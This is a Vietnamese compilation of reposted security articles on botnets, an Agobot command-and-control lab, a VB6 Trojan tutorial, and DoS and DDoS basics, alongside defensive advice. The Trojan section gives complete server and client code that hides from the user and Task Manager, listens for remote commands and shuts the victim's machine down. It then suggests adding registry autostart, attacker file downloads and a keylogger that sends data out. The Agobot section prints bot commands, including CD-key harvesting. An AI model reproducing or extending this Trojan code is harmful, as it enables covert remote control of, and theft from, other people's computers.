Cơ chế được dùng để phân phối bot là một trong những lý do chính gây nên cái gọi là tạp nhiễu nền Internet. Một số cổng chính được dùng cho Windows, cụ thể là Windows 2000, XP SP1 (xem Bảng 1). Chúng dường như là đích ngắm yêu thích của hacker, vì rất dễ tìm ra một máy tính Windows chưa được cập nhật bản vá đầy đủ hoặc không cài đặt phần mềm tường lửa. Trường hợp này cũng rất phổ biến với người dùng máy tính gia đình và các doanh nghiệp nhỏ, những đồi tượng thường bỏ qua vấn đề bảo mật và luôn kết nối Internet băng thông rộng.

Cổng Dịch vụ
42 WINS (Host Name Server)
80 HTTP (lỗ hổng IIS hay Apache)
135 RPC (Remote Procedure Call)
137 NetBIOS Name Service
139 NetBIOS Session Service
445 Microsoft–DS–Service
1025 Windows Messenger
1433 Microsoft–SQL–Server
2745 Bagle worm backdoor
3127 MyDoom worm backdoor
3306 MySQL UDF (User Definable Functions)
5000 UPnP (Universal Plug and Play)

Bảng 1: Danh sách các cổng gắn với lỗ hổng dịch vụ

Giai đoạn Điều khiển gồm một số hoạt động thực hiện sau khi bot đã được cài đặt lên máy đích trong một thư mục chọn. Để khởi động với Windows, bot update các khoá đăng ký, thông thường là HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\. Việc đầu tiên bot thực hiện sau khi được cài đặt thành công là kết nối tới một server IRC và liên kết với kênh điều khiển thông qua sử dụng một mật khẩu. Nickname trên IRC được tạo ngẫu nhiên. Sau đó, bot ở trạng thái sẵn sàng chờ lệnh từ ứng dụng chủ. Kẻ tấn công cũng phải sử dụng một mật khẩu để kết nối tới botnet. Điều này là cần thiết để không ai khác có thể sử dụng mạng botnet đã được cung cấp.


Hình 2
: Kỹ thuật botnet hardening

IRC không chỉ cung cấp phương tiện điều khiển hàng trăm bot mà còn cho phép kẻ tấn công sử dụng nhiều kỹ thuật khác nhau để ẩn nhân dạng thực của chúng. Điều đó khiến việc đối phó trước các cuộc tấn công trở nên khó khăn. Nhưng may mắn là, do đặc điểm tự nhiên của chúng, các botnet luôn tạo ra lưu lượng đáng ngờ, tạo điều kiện dễ dàng để có thể dò tìm nhờ một số kiểu mẫu hay mô hình đã biết. Điều đó giúp các quản trị viên IRC phát hiện và can thiệp kịp thời, cho phép họ gỡ bỏ các mạng botnet và những sự lạm dụng không đáng có trên hệ thống của họ.

Trước tình hình này, những kẻ tấn công buộc phải nghĩ ra cách thức khác, cải tiến kỹ thuật C&C (Control and Command – Điều khiển qua lệnh) thành botnet hardening. Ở kỹ thuật mới này, các bot thường được cấu hình để kết nối với nhiều server khác nhau, sử dụng một hostname ánh xạ động. Nhờ đó, kẻ tấn công có thể chuyển bot sang server mới dễ dàng, vẫn hoàn toàn nắm quyền kiểm soát ngay cả khi bot đã bị phát hiện. Các dịch vụ DNS động như dyndns.com hay no-IP.com thường được dùng trong kiểu tấn công này.

DNS động

Một DNS động (như RFC 2136) là một hệ thống liên kết tên miền với địa chỉ IP động. Người dùng kết nối Internet qua modem, ADSL hoặc cáp thường không có địa chỉ IP cố định. Khi một đối tượng người dùng kết nối tới Internet, nhà cung cấp dịch vụ mạng (ISP) sẽ gán một địa chỉ IP chưa được sử dụng lấy ra từ vùng được chọn. Địa chỉ này thường được giữ nguyên cho tới khi người dùng ngừng sử dụng kết nối đó.

Cơ chế này giúp các hãng cung cấp dịch vụ mạng (ISP) tận dụng được tối đa khả năng khai thác địa chỉ IP, nhưng cản trở đối tượng người dùng cần thực hiện một số dịch vụ nào đó qua mạng Internet trong thời gian dài, song không phải sử dụng địa chỉ IP tĩnh. Để giải quyết vấn đề này, DNS động được cho ra đời. Hãng cung cấp sẽ tạo cho dịch vụ một chương trình chuyên dụng, gửi tín hiệu tới cơ sở dữ liệu DNS mỗi khi địa chỉ IP của người dùng thay đổi.

Để ẩn hoạt động, kênh IRC được cấu hình giới hạn quyền truy cập và ẩn thao tác. Các mô hình IRC điển hình cho kênh botnet là: +k (đòi hỏi phải nhập mật khẩu khi dùng kênh); +s (không được hiển thị trên danh sách các kênh công cộng); +u (chỉ có người điều hành (operator) là được hiển thị trên danh sách người dùng); +m (chỉ có người dùng ở trạng thái sử dụng âm thanh +v mới có thể gửi tin đến kênh). Hầu hết mọi chuyên gia tấn công đều dùng server IRC cá nhân, mã hoá tất cả liên lạc trên kênh dẫn. Chúng cũng có khuynh hướng sử dụng nhiều biến thể cá nhân hoá của phần mềm IRC server, được cấu hình để nghe trên các cổng ngoài tiêu chuẩn và sử dụng phiên bản đã được chỉnh sửa của giao thức, để một IRC client thông thường không thể kết nối vào mạng.

Theo Security


Đấu giá trực tuyến hàng đầu Việt Nam

Xây dựng một Trojan đơn giản bằng VB6

Chúng tôi đăng bài này không phải mục đích khuyến khích các bạn viết virus phá hoại dữ liệu người dùng mà chỉ muốn qua bài viết này các bạn có thể hiểu biết một phần nào đó về cách xây dựng một virus. Qua đây các bạn cũng có thể xây dựng các ý tưởng về một phần mềm chống virus khi chúng ta biết rõ đường đi của một virus mạng.

Viết một Trojan dễ dàng hơn nhiều so với mọi người nghĩ. Tất cả thực sự chỉ cần hai chương trình ứng dụng đơn giản với nội dung ít hơn 100 dòng mã lệnh. Chương trình đầu tiên là client, là chương trình cho người sử dụng biết. Chương trình thứ hai là server, hay phần “trojan” thực. Bây giờ chúng ta sẽ xem chúng ta cần gì cho cả hai và một số ví dụ mẫu.

Server

Server là phần Trojan của chương trình. Nó cần phải được giấu để người dùng bình thường không thể tìm thấy nó.
Để thực hiện điều này bạn bắt đầu bằng cách sử dụng đoạn mã lệnh sau:

Private Sub Form_Load()
Me.Visible = False
End Sub

Đoạn mã này làm cho chương trình không thể thấy được bằng mắt thường nhưng có thể bị phát hiện trong Task Manager của Windows vì thế nếu muốn chương trình ẩn tốt hơn, chúng ta có thể viết đoạn mã như sau:

Private Sub Form_Load()
Me.Visible = False
App.TaskVisible = False
End Sub

(Trong hệ điều hành Windows, tất cả chương trình có đuôi .exe đều được thể hiện trong danh sách chương trình chạy. Tuy nhiên chương trình của bạn sẽ được ẩn trong Running Applications List )
Bây giờ chúng ta đã có một chương trình tàng hình đối với người sử dụng bình thường, mà chỉ cần có bốn dòng lệnh. Tuy nhiên nó vẫn còn quá đơn giản, chúng ta có thể làm cho nó tốt hơn bằng cách thêm vào một số hàm.
Đầu tiên là làm sao cho nó có thể “nghe” được các kết nối khi nó xâm nhập được vào máy, chúng ta cần thêm vào một điều khiển Winsock Control.
Tôi đặt tên cho điều khiển của tôi là “win”. Còn các bạn có thể đặt là bất cứ cái gì tuỳ ý. Để làm cho Trojan “nghe” được cổng 2999 khi khởi động, chúng ta viết đoạn mã như sau:

Private Sub Form_Load()
Me.Visible = False
App.TaskVisible = False
win.LocalPort = 2999
win.RemotePort = 455
win.Listen
End Sub

Đoạn mã này thiết lập một cổng mở cục bộ tới cổng 2999, và cổng mà nó gửi tới là 445.
Bây giờ, chương trình đã có thể “nghe”, nhưng chưa làm được điều gì rõ ràng cả. Chúng ta thêm đoạn mã sau vào form chính:

Private Sub win_ConnectionRequest(ByVal requestID As Long)
win.Close
win.Accept requestID
End SubPrivate Sub win_DataArrival(ByVal bytesTotal As Long)
win.GetData GotDat
DoActions (GotDat)
End Sub

Tiếp theo, chúng ta sẽ viết hàm DoActions như là một chương trình con để gọi vào main form. Đoạn mã trên thực hiện hai nhiệm vụ: Đầu tiên là làm cho tất cả các yêu cầu kết nối được tự động chấp nhận; tiếp đó là làm cho tất cả các dữ liệu được tự động chấp nhận và sau đó thì chuyển toàn bộ dữ liệu này sang cho hàm DoActions mà chúng ta sẽ viết dưới đây.
Hàm DoActions nên viết ở dạng public để các chương trình ở ngoài modul cũng có thể dùng được. Thêm đoạn mã sau vào modul, và chúng ta đang làm việc với server của Trojan:

Public Function DoActions(x As String)
Select Case x
Case “msgbox”
Msgbox “The file C:\windows\getboobies.exe has caused an error and will be terminated”,vbCritical,”Critical Error”
Case “shutdown”
shell “shutdown -s -f -t 00”
End Select
End Function

Bây giờ bạn đã có một chương trình mà khi dữ liệu “Msgbox” được gửi tới cổng 2999, nó sẽ thể hiện một hộp tin nhắn msgbox trên máy tính của nạn nhân. Khi dữ liệu “shutdown” được gửi tới cổng 2999, nó sẽ tắt máy tính của nạn nhân. Tôi dùng câu lệnh “Select Case” để dễ dàng chỉnh sửa đoạn mã về sau này. Xin chúc mừng, bạn vừa mới viết xong Trojan đầu tiên của bạn. Bây giờ chúng ta hãy xem lại đoạn mã hoàn chỉnh.

Main Form

Private Sub Form_Load()
Me.Visible = False
App.TaskVisible = False
win.LocalPort = 2999
win.RemotePort = 455
win.Listen
End SubPivate Sub win_ConnectionRequest(ByVal requestID As Long)
win.Close
win.Accept requestID
End Sub

Private Sub win_DataArrival(ByVal bytesTotal As Long)
win.GetData GotDat
DoActions (GotDat)
End Sub

Hãy nhớ thêm điều khiển winsock và đặt tên nó là “win” nếu bạn dùng đoạn mã này:

Module

Public Function DoActions(x As String)
Select Case x
Case “msgbox”
Msgbox “The file C:\windows\getboobies.exe has caused an error and will be terminated”,vbCritical,”Critical Error”
Case “shutdown”
shell “shutdown -s -f -t 00”
End Select
End Function

Tất cả phần Server của Trojan chỉ có thể. Giờ chúng ta xem xét đến phần Client.

Client

Client là cái mà bạn sẽ tương tác tới. Bạn sẽ dùng nó để kết nối tới server từ xa (trojan) và gửi cho nó các lệnh. Sau khi đã viết được phần server chấp nhận câu lệnh “shutdown”, “msgbox”, chúng ta hãy tạo ra một client gửi đi các câu lệnh đó.
Tạo một form thêm một điều khiển Winsock Control, một hộp text box và bốn nút. Trong đoạn mã dưới hộp text box được đặt tên là txtIP, các nút được đặt tên là cmdConnect, cmdMsgbox, cmdShutdowncmdDisconnect. Đoạn mã như sau:

Private Sub cmdConnect_Click()
IpAddy = txtIp.Text
Win.Close
Win.RemotePort = 2999
Win.RemoteHost = IpAddy
Win.LocalPort = 9999
Win.Connect
cmdConnect.Enabled = False
End SubPrivate Sub cmdDisconnect_Click()
Win.Close
cmdConnect.Enabled = True
End Sub

Private Sub cmdMsgbox_Click()
Win.SendData “msgbox”
End Sub

Private Sub cmdShutdown_Click()
Win.SendData “shutdown”
End Sub

Đó là đoạn mã cho client. Tất cả việc nó làm là lấy địa chỉ IP từ txtIP và kết nối với cổng từ xa 2999. Sau khi được kết nối, bạn có thể gửi dữ liệu “shutdown” hay “msgbox” tới server và các hoạt động tương ứng sẽ được thực hiện (tắt máy tính hay thể hiện một hộp tin nhắn).
Hai chương trình này làm được rất ít nhưng có thể cải tiến nhanh chóng thành một chức năng quản trị từ xa mạnh nếu bạn biết bạn đang làm gì. Tôi đề nghị là nên cố gắng thêm các loại điều khiển lỗi và hàm cho cả client và server.

Lời khuyên

– Hãy làm cho server có thể tải được một file đặc tả của người tấn công.
Thêm mã lệnh để Server được thực thi lúc khởi động (là một khoá thanh ghi).
– Và một keylogger cho server – làm cho nó gửi thông tin cho người tấn công.
– Có rất nhiều cách bạn có thể làm, chỉ cần dùng trí tưởng tượng của bạn.

Theo Quantrimang


Đấu giá trực tuyến hàng đầu Việt Nam

Botnet hoạt động như thế nào (Phần 2)

Bây giờ là một vụ tấn công mẫu, cho phép chúng ta quan sát và hiểu một chương trình Command and Control (điều khiển qua lệnh) được thực hiện như thế nào.

Một C&C thực tế – Agobot

Hai máy tính sẽ được sử dụng. Máy đầu tiên chạy một server IRC dựa trên UnrealIRCd 3.2.3 và hai hệ điều hành Windows XP SP1 ảo dựa trên VMware Workstation (hai máy đích có khả năng bị tấn công). Máy thứ hai dành cho người chủ trì, điều khiển botnet qua Irssi, một text IRC client.

Để tạo chương trình thiết kế đối chiếu (reverse engineering) thật khó, Agobot thực hiện một số thường trình tự bảo vệ trước các bộ gỡ lỗi như SoftICE hay OllyDbg và trước các máy ảo như VMware, Virtual PC. Điều đó là cần thiết để hack được mã nguồn nhằm vượt qua chương trình bảo vệ của VMware, trước khi có thể cài đặt bot lên các máy ảo mẫu của chúng ta.

Cấu hình

Bước đầu tiên là cấu hình bot thông qua giao diện đồ hoạ đơn giản của nó (Xem hình 3). Thông tin được nhập vào bao gồm tên, số cổng IRC server, tên kênh, danh sách người sử dụng với mật khẩu master (chủ điều khiển), cuối cùng là tên file và thư mục cài đặt bot. Một số thành phần bổ sung cũng được kích hoạt như hỗ trợ sniffing và cơ chế trạng thái. Kết quả của giai đoạn này là file config.h, file nền tảng trong quá trình biên dịch bot được tạo.


Hình 3
: Giao diện cấu hình Agobot.

Điều khiển theo lệnh (Command and Control)

Sau khi bot được biên dịch, hai hệ thống còn lại sẽ tấn công theo kiểu “thủ công”. Máy chủ (master) kết nối tới IRC server và liên kết với kênh dẫn để có thể ra lệnh điều khiển cho bot (xem hình 4).


Hình 4
: Máy chủ và kết nối kênh

Muốn thu được quyền điều khiển qua các bot, một cơ chế thẩm định là cần thiết. Cơ chế này được tạo đơn giản bằng cách gửi một lệnh tới kênh (xem hình 5).

.login FaDe dune


Hình 5
: Thẩm định username và password

Sau đó, bot đầu tiên được yêu cầu đưa ra danh sách tất cả chương trình đang chạy trên máy tính bị chiếm quyền kiểm soát (xem hình 6):

/msg FakeBot–wszyzc .pctrl.list


Hình 6
: Máy chủ đưa ra yêu cầu cho bot đầu tiên

Sau đó, bot thứ hai được yêu cầu đưa ra thông tin và khoá cdkey của các chương trình ứng dụng cài đặt trên máy (hình 7):

/msg FakeBot2–emcdnj .bot.sysinfo
/msg FakeBot2–emcdnj .harvest.cdkeys


Hình 7
: Máy chủ đưa ra yêu cầu cho bot thứ hai

Ở ví dụ này chúng ta sử dụng những tính năng hết sức đơn giản. Còn thực tế, Agobot cung cấp một tập hợp rất phongphus các lệnh và chức năng. Một trong số chúng bạn có thể xem ở Bảng 2:

Lệnh Mô tả
command.list Danh sách tất cả các lệnh có thể sử dụng
bot.dns Xử lý một địa chỉ IP hoặc hostname
bot.execute Chạy một file .exe trên máy từ xa
bot.open Mở một file trên máy từ xa
bot.command Chạy một lệnh với system()
irc.server Kết nối tới một IRC server
irc.join Nhập thông tin của một kênh dẫn cụ thể
irc.privmsg Gửi thư riêng cho một người dùng
http.execute Download và thực thi file qua HTTP
ftp.execute Download và thực thi file qua FTP
ddos.udpflood Khởi động một chương trình UDP tràn
ddos.synflood Khởi động một Syn tràn
ddos.phaticmp Khởi động một PHATicmp tràn
redirect.http Khởi động một HTTP proxy
redirect.socks Khởi động một SOCKS4 proxy
pctrl.list Đưa ra danh sách chương trình
pctrl.kill Loại bỏ các chương trình

Bảng 2: Một số lệnh Agobot

Bảo vệ máy tính của bạn như thế nào

Bây giờ chúng ta sẽ xem xét một số phương thức bảo vệ trước khả năng xâm phạm và phá hoại của kiểu tấn công bot, dưới góc nhìn của cả người dùng và nhà quản trị.

Các chiến lược bảo vệ cho người dùng PC

Như đã đề cập tới ở trên, tấn công bot chủ yếu được thực hiện qua các loại sâu, lướt trên mạng để tìm kiếm lỗ hổng thâm nhập được. Do đó, bước đầu tiên là phải cập nhật thường xuyên, download cá bản vá và bản update hệ thống cho cả hệ điều hành cũng như các ứng dụng truy cập Internet. Sử dụng chương trình update tự động là một ý kiến hay. Bạn cũng nên cẩn thận khi mở các file đính kèm đáng ngờ trong e-mail. Cũng sẽ là khôn ngoan khi loại bỏ hỗ trợ hình thức ngôn ngữ kịch bản như ActiveX và JavaScript (hoặc ít nhất là kiểm soát việc sử dụng của chúng). Cuối cùng, yếu tố cơ sở là bạn phải dùng ít nhất một chương trình diệt virus, trojan và luôn luôn update phiên bản mới nhất của chúng. Dẫu vậy, nhiều bot được cấu hình lần tránh khởi sự kiểm soát của các chương trình diệt virus. Vì thế, bạn nên dùng thêm phần mềm tường lửa cá nhân, nhất là khi sử dụng máy tính nối mạng liên tục 24 giờ/ngày.

Dấu hiệ chính khi có hiện diện của bot là tốc độ máy và tốc độ kết nối mạng trở nên cực kỳ chậm. Một cách kiểm tra các kết nối đáng ngờ đơn giản và hiệu quả là sử dụng công cụ netstat (xem hình 8):

C:/>netstat –an


Hình 8
: Netstat trên một máy bị tấn công

Netstat

Netstat là một công cụ linh hoạt, tương thích được cả trên hệ điều hành Windows và các hệ thống *NIX. Chức năng của nó là kiểm soát các cổng đã được kích hoạt. Netstat kiểm tra quá trình nghe trên cổng TCP và UDP, sau đó cung cấp thông tin chi tiết và hoạt động mạng. Trên hệ thống *NIX, netstat hiển thị tất cả các dòng mở. Nó cũng sử dụng các bộ lọc chọn ngoài.

Trạng thái kết nối có thể trên Netstat gồm:

  • ESTABLISHED – tất cả các host đều được kết nối
  • CLOSING – host từ xa đang đóng kết nối
  • LISTENING – host đang nghe kết nối đến
  • SYN_RCVD – một host từ xa đuwocj yêu cầu khởi động kết nối
  • SYN_SENT – host đang khởi động kết nối mới
  • LAST_ACK – host phải gửi báo cáo trước khi đóng kết nối
  • TIMED_WAIT, CLOSE_WAIT – một host từ xa đang kết thúc kết nối
  • FIN_WAIT 1 – client đang kết thúc kết nối
  • FIN_WAIT 2 – cả hai host đều đang kết thúc kết nối

Quan sát các kết nối ESTABLISHED tới cổng TCP trong phạm vi 6000 đến 7000 (thông thường là 6667). Nếu bạn thấy mình tính của mình bị xâm hại, hãy ngắt nó ra khỏi mạng Internet, làm sạch hệ thống, khởi động lại và kiểm tra.

Chiến lược bảo vệ cho người quản trị

Các quản trị viên thường phải cập nhật liên tục thông tin về những lỗ hổng mới nhất, cũng như đọc thường xuyên về tài nguyên bảo mật trên Internet mỗi ngày. Một số công cụ hỗ trợ Bugtraq, đưa ra bản mô tả tóm tắt danh sách thư là một ý kiến hay. Các quản trị viên cũng nên cố gắng tuyền truyền, nâng cao nhận thức cho người dùng của mình về vấn đề bảo mật và các chính sách bảo mật.

Nghiên cứu nhật ký thường trình (bản ghi log) do IDS và nhiều hệ thống tường lửa, mail server, DHCP, proxy server tạo ra cũng rất cần thiết. Điều này có thể giúp phát hiện ra lưu lượng bất thường, một dấu hiệu của sự hiện diện bot và nhờ đó có biện pháp ngăn chặn kịp thời. Sau khi lưu lượng bất thường được chú ý, một siffer sẽ đến để nhận dạng mạng con và máy tính tạo ra nó. Tất cả các biện pháp dường như đều quen thuộc và không mấy khó khăn, nhưng mọi người thường quên, hoặc bỏ qua chúng.

Bạn cũng có thể sử dụng một số kỹ thuật phức tạp hơn như honeybot. Honeybot là các máy được xây dựng với mục đích hấp dẫn kẻ tấn công. Vai trò của chúng là trở thành máy tính nạn nhân, giúp người quản trị định vị chính nguồn của vấn đề và nghiên cứu phương thức tấn công.

Nhưng kết luận cuối cùng thì, cho dù công cụ hỗ trợ là gì đi chăng nữa, biện pháp phòng chống và bảo vệ tốt nhất trước các cuộc tấn công botnet là bản thân người dùng và nhận thức của họ.

Đôi điều về tác giả

Tác giả của cuốn “Các cuộc chiến robot – Botnet hoạt động như thế nào” mà chúng ta vừa xem xét một phần nội dung của nó qua bài này là một nhóm ba người: Massimiliano Romano, Simone Rosignoli, Ennio Giannini. Nếu có điều kiện và bạn đọc nào có nhu cầu tìm hiểu chuyên sâu hơn về những nội dung thú vị trong cuốn sách này, bạn có thể mua trên eBay hoặc tìm kiếm từ nguồn Internet phong phú. Và dưới đây là đôi điều về tác giả của cuốn sách này:

Massimiliano Romano: sở thích của ông là khoa học máy tính và mạng. Ông làm việc với vai trò nhân viên tự do ở một trong các công ty điện thoại di động lớn nhất Italia. Ông bỏ ra rất nhiều thời gian vào Ham Radio, đầu tư nghiên cứu và giải mã các tín hiệu radio số.

Simone Rosignoli hiện đang là sinh viên trường đại học La Sapienza ở Rome. Anh đang theo đuổi bằng Công nghệ khoa học máy tính (bảo mật và hệ thống) ở trường. Sở thích của chàng sinh viên này là lập trình bảo mật máy tính. Quả thât, “nhân tài không đợi tuổi”!

Ennio Giannini làm việc với vai trò như một chuyên gia phân tích hệ thống. Anh sử dụng nhiều thời gian rảnh rỗi của mình vào các cuộc thử nghiệm trong môi trường GNU/Linux. Anh là một người hỗ trợ và tổ chức nguồn mở tích cực và mạnh mẽ.

Theo Security


Đấu giá trực tuyến hàng đầu Việt Nam

6 cách để phòng chống botnet

Botnet là một mối đe dọa đang ngày một lan rộng, tuy nhiên chúng ta có nhiều cách đối phó để giảm được các tác hại gây ra từ nó.
Trong bài viết này, Quantrimang.com sẽ giới thiệu cho các bạn 6 cách khá chuyên nghiệp có thể chống trả lại được botnet.

Thuê một dịch vụ lọc Web

Dịch vụ lọc Web là một trong những cách tốt nhất để đấu tranh với bot. Các dịch vụ này quét website khi thấy xuất hiện hành vi không bình thường hoặc có các hành động mã nguy hiểm và khóa site đó từ người dùng.


Websense, Cyveillance và FaceTime Communications là các ví dụ điển hình. Tất cả sẽ kiểm tra Internet theo thời gian thực tìm các website bị nghi ngờ có hành động nguy hiểm như tải JavaScript và các trò lừa đảo khác ngoài ranh giới của việc duyệt web thông thường. Cyveillance và Support Intelligence cũng cung cấp dịch vụ cho biết về các tổ chức website và ISP đã phát hiện là có malware, vì vậy các máy chủ bị tấn công có thể được sửa chữa kịp thời.

Chuyển đổi trình duyệt

Một cách khác để ngăn chặn sự xâm nhập của bot là không nên sử dụng một trình duyệt. Internet Explorer hay Mozilla Firefox là hai trình duyệt phổ biến nhất và vì vậy chúng cũng là các trình duyệt mà malware tập trung tấn công tới. Tương tự như vậy đối với các hệ điều hành. Theo thống kê thì Macs là hệ điều hành an toàn với botnet bởi vì hầu hết chúng đều nhằm vào Windows.

Vô hiệu hóa các kịch bản

Một cách nữa là vô hiệu hóa trình duyệt khỏi các kịch bản nói chung (script), điều này có thể gây khó khăn cho một số nhân viên sử dụng ứng dụng tùy chỉnh và dựa trên nền web trong công việc của họ.

Triển khai các hệ thông phát hiện xâm phạm và ngăn chặn xâm phạm

Một phương pháp khác đó là điều chỉnh các IDS và ISP để chúng có thể tìm kiếm được các hoạt động tương tự như botnet. Ví dụ, một máy tính nào đó bất ngờ gặp vấn đề sự cố trên Internet Relay Chat là hoàn toàn đáng nghi ngờ. Cũng giống như việc kết nối vào các địa chỉ IP ở xa hoặc địa chỉ DNS không hợp lý. Tuy vấn đề này là khó phát hiện nhưng chúng ta có cách phát giác khác khi phát hiện thấy sự thu hút bất ngờ trong lưu lượng SSL trên một máy tính, đặc biệt trong các cổng không bình thường. Điều đó có thể là kênh mà botnet chiếm quyền điều khiển đã bị kích hoạt.

Chính vì vậy chúng ta cần một ISP để kiểm tra về những hành vi không bình thường để chỉ thị cảnh báo các tấn công dựa trên HTTP và thủ tục gọi từ xa, Telnet- và giả mạo giao thức giải pháp địa chỉ, các tấn công khác. Mặc dù vậy chúng ta phải nên chú ý rằng nhiều bộ cảm biến ISP sử dụng phát hiện dựa trên chữ ký, điều đó nghĩa là các tấn công chỉ được bổ sung vào cơ sở dữ liệu khi nào chúng được phát hiện. Chính vì vậy các ISP phải cập nhật kịp thời để nhận ra được các tấn công này, bằng không bộ phát hiện sẽ không còn giá trị.

Bảo vệ nội dung được tạo bởi người dùng

Các hoạt động website của riêng bạn cũng phải được bảo vệ để tránh trở thành kẻ tòng phạm không chủ tâm đối với những kẻ viết malware. Các blog công cộng và forum của công ty nên được hạn chế chỉ ở dạng văn bản.

Nếu site của bạn cần cho các thành viên trao đổi file thì nó phải được thiết lập để cho phép các kiểu file được giới hạn và đảm bảo an toàn, ví dụ với các file có đuôi mở rộng .jpeg hoặc .mp3. (Tuy vậy những kẻ viết malware cũng đã bắt đầu nhắm vào đối tượng người chơi MP3)

Sử dụng công cụ phần mềm

Nếu bạn phát hiện thấy máy tính bị tiêm nhiễm mà hệ thống không có cách nào tốt nhất để giải quyết với tình huống này. Bạn không phải lo sợ điều đó vì các công ty như Symantec xác nhận rằng họ có thể phát hiện và xóa sạch sự tiêm nhiễm rootkit nguy hiểm nhất. Công ty này đã đưa ra một nghệ mới trong Veritas, VxMS (Dịch vụ bản đồ hóa Veritas – Veritas Mapping Service), đưa ra bộ quét chống virus bỏ qua Windows File System API, thành phần được điều khiển bởi hệ điều hành có thể gây ra lỗ hổng bởi một rootkit. VxMS truy cập trực tiếp vào các file thô của hệ thống Windows NT File System. Bên cạnh đó các hãng phần mềm chống virus khác cũng đang cố gắng trong việc chống lại rootkit này gồm có McAfee và FSecure.

(Theo quản trị mạng)


Đấu giá trực tuyến hàng đầu Việt Nam

Tìm hiểu về tấn công từ chối dịch vụ DoS

Có thể bạn đã từng nghe nhiều về tấn công từ chối dịch vụ và cũng có thể đã từng là nạn nhân của kiểu tấn công này. Tấn công từ chối dịch vụ rất khó có thể phân biệt với các hoạt động mạng, tuy nhiên có nhiều dấu hiệu để phát hiện ra các tấn công này và Quantrimang.com sẽ giới thiệu một số dấu hiệu đó.

Tìm hiểu về tấn công từ chối dịch vụ (DoS)?

Trong tấn công từ chối dịch vụ, kẻ tấn công cố gắng ngăn cản người dùng truy cập thông tin hoặc dịch vụ. Bằng cách nhằm vào các máy tính và sử dụng mạng máy tính mà bạn đang dùng, kẻ tấn công có thể ngăn cản truy cập email, website, tài khoản trực tuyến (ví dụ như ngân hàng) và các dịch vụ khác.

Một kiểu Dos rõ ràng và phổ biến nhất là một kẻ tấn công “làm lụt” mạng bằng thông tin. Khi bạn nhập vào URL của một website vào trình duyệt, lúc đó bạn đang gửi một yêu cầu đến máy chủ của trang này để xem. Máy chủ chỉ có thể xử lý một số yêu cầu vì vậy nếu một kẻ tấn công làm quá tải máy chủ với nhiều yêu cầu thì có thể yêu cầu của bạn không được xử lý. Đây là kiểu “từ chối dịch vụ” vì nó làm cho bạn không thể truy cập đến trang đó.

Tấn công từ chối dịch vụ phân tán DDos

Kẻ tấn công có thể sử dụng thư rác để thực hiện các tấn công tương tự trên tài khoản email của bạn. Dù bạn có một tài khoản email được cung cấp bởi nhân viên của bạn hay có sẵn qua một dịch vụ miễn phí như Yahoo hay Hotmail thì vẫn bị giới hạn số lượng dữ liệu trong tài khoản. Bằng cách gửi nhiều email đến tài khoản của bạn, kẻ tấn công có thể tiêu thụ hết phần nhận mail và ngăn chặn bạn nhận được các mail khác.

Thế nào là tấn công từ chối dịch vụ phân tán (DDoS)?

Trong tấn công từ chối dịch vụ phân tán (DDoS), một kẻ tấn công có thể sử dụng máy tính của bạn để tấn công vào các máy tính khác. Bằng cách lợi dụng những lỗ hổng về bảo mật cũng như sự không hiểu biết, kẻ này có thể giành quyền điều khiển máy tính của bạn. Sau đó chúng sử dụng máy tính của bạn để gửi số lượng lớn dữ liệu đến một website hoặc gửi thư rác đến một địa chỉ hòm thư nào đó. Tấn công này được được gọi là “phân tán” vì kẻ tấn công sử dụng nhiều máy tính trong đó có cả máy tính bạn để thực hiện tấn công Dos.

Làm thế nào để tránh vấn đề trên?

Thực sự không có một biện pháp cụ thể nào để tránh trở thành nạn nhân của Dos hay DDos. Tuy nhiên chúng tôi sẽ giới thiệu cho các bạn vài bước với mục đích giảm bớt phần nào kiểu tấn công mà sẽ sử dụng máy tính của bạn đế đi tấn công máy tính khác.

  • Cài đặt và duy trì phần mềm chống virus.
  • Cài đặt tường lửa và cấu hình nó để giới hạn lưu lượng đến và đi từ máy tính của bạn.
  • Làm theo các hướng dẫn thực hành an toàn về phân phối địa chỉ email của bạn.
  • Dùng các bộ lọc email để giúp bạn quản lý lưu lượng không mong muốn.

Nhận biết các cuộc tấn công Dos và DDos

Không phải sự sập đổ hoàn toàn nào của dịch vụ cũng là kết quả của một tấn công từ chối dịch vụ. Có nhiều vấn đề kỹ thuật với một mạng hoặc với các quản trị viên đang thực hiện việc bảo trì và quản lý. Mặc dù thế nhưng với các triệu chứng dưới đây bạn có thể nhận ra tấn công DoS hoặc DdoS:

  • Thực thi mạng chậm một cách không bình thường (mở file hay truy cập website)
  • Không vào được website bạn vẫn xem
  • Không thể truy cập đến bất kỳ một website nào
  • Số lượng thư giác tăng một cách đột biến trong tài khoản của bạn.

Nên làm gì nếu bạn nghĩ mình đang bị tấn công?

Cho dù bạn có xác định đúng tấn công DoS hoặc DdoS đi chăng nữa thì bạn cũng không thể xác định được nguồn hoặc đích của tấn công. Chính vì vậy bạn nên liên hệ đến các chuyên gia kỹ thuật để được hỗ trợ.

  • Nếu bạn thấy rằng không thể truy cập vào chính các file của mình hoặc vào bất cứ website mở rộng nào từ máy tính thì bạn nên liên hệ với người quản trị mạng của mạng đó. Điều này có thể chỉ ra rằng máy tính của bạn hoặc mạng của tổ chức đang bị tấn công hay không.
  • Nếu bạn thấy những vấn đề xảy ra trên chính máy tính của mình, thì bạn hãy liên hệ với nhà cung cấp dịch vụ (ISP). Nếu có vấn đề, ISP có thể khuyên bạn có những hành động thích hợp.

(Theo quản trị mạng)


Đấu giá trực tuyến hàng đầu Việt Nam

DoS và DDoS toàn tập – Phần II

DoS và DDoS toàn tập – Phần II
Trong phần II của bài viết về tấn công DoS và DDoS tôi sẽ trình bày với các bạn nội dung chi tiết về mạng Bot, các dạng mạng Bot và cách tạo ra mạng Botnet. Khi hiểu về mạng Botnet bạn có thể hình dung ra phương thức tấn công DDoS.

Phần I: của bài viết tập trung vào DoS

Trong phần II này tôi cũng trình bày với các bạn chi tiết các phương thức tấn công DDoS các thực hiện các phương thức tấn công này. Nhưng bài viết này chỉ có tác dụng giúp các bạn hiểu biết sâu về tấn công DDoS mà thôi, các tools giới thiệu chỉ mang tính giới thiệu vì nó là các tools DDoS cũ.

VI. Mạng BOT NET

1. Ý nghĩa của mạng BOT

– Khi sử dụng một Tool tấn công DoS tới một máy chủ đôi khi không gây ảnh hưởng gì cho máy chủ – Giả sử bạn sử dụng tool Ping of Death tới một máy chủ, trong đó máy chủ kết nối với mạng tốc độ 100Mbps bạn kết nối tới máy chủ tốc độ 3Mbps – Vậy tấn công của bạn không có ý nghĩa gì.

